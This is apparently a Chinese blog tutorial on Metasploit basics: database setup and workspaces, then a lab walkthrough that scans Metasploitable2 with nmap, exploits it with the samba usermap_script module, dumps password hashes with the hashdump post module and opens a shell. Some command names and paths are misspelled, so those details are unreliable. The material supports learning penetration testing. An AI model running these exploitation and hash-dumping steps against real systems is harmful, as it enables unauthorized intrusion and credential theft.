Metasploit基础
- Metasploit框架介绍
- Metasploit数据库设置
- Metasploit测试案例
- Metasploit的升级
Metasploit框架介绍
MSF是用Ruby编写,采用模块化的方法完成渗透测试,易于拓展和代码编写。
目前支持两种界面操作:
- msfconsole 命令行
- armitage 图形化界面
Metasploit数据库设置
使用数据库可储存渗透信息,便于大规模操作
-
启动postgresql
systemctl start postgresql
-
初始化数据库
msfdb init
数据库文件保存在 /usr/share/metasploit-freamwork/config/datebase.yml -
数据库状态
systemctl status postgresql
或者打开框架(进入msfconsole)后使用db_status
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MlbHYjWC-1680007313086)(1.metasploit%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D_md_files/2a9880a0-b627-11ec-b129-9d3e3b1d911b.jpeg?v=1&type=image)] -
其他命令
框架内查看帮助输入:?
,可以配合 (管道与过滤命令)| grep xx命令
进行精确查找
Metasploit测试案例
对Metasploitable2进行简单的测试
1.工作空间设置
workspace
工作空间帮助查询workspase -h
工作空间查看workspace
星号*所在的位置表示现在所在的空间
工作空间切换 workspace 工作空间名
新建工作空间 workspace -a metasploit2[192.168.108.132]
新建多个空间可以在每个空间之间加空格
重命名 workspace -r 老名字 新名字
删除workspace -d 工作空间名
-D
是删除所有空间
2.目标导入设置
-
nmap输出扫描结果文件
namp -sV -P0 目标Ip -oA 文件名
-sV
扫描开启的服务-P0
不进行主机存活扫描,不进行ping扫描,避免防火墙报警-oA
输出所有格式的文件 如果位规定位置则在那个目录下执行操作保存在那个目录下删除之前输出的所有格式的内容
rm xxx.*
-
msfconsole导入结果
3.漏洞利用代码
db_import文件路径/文件名
导入文件 不加文件名可以查看可以导入的文件类型
导入文件后,可以用?
查看文件的一些信息如 host
查看主机或services
查看服务
-
search 服务名称
查询可以利用的漏洞攻击载荷
-
info漏洞利用代码
info
漏洞攻击载荷(它前面的数字也可以) 可以查看该载荷的使用方式和代码等信息
4.漏洞利用流程
-
use 漏洞的路径(前面的数字也可以)如
use multi/samba/usermap_script
-
options
查看所要的配置 -
set配置
如set rhost 192.168.217.11
设置ip -
run
或exploit
运行 -
后台会话
置于后台 CTRL+z键 再加
y
查看
sessions
5.后渗透测试
进行其他方面的渗透
hashdump use /post/linux/gather/hashdump
设置session set session n
数字n与前面的session保持一致 ,run
运行
运行后还会将获取的信息保存在相关的文件夹下
loot 查看数据库信息,初次还会将数据库信息保存到本地
进一步信息通过 loot -h
查询
退回到原来的模块 sessions -i 进程号
关于进程其他可以通过 sessions -h
查询
shell
获取靶机shell 可以改变竖屏(竖屏太难受了)
Metasploit升级
apt-get update
+apt install metasploit-framework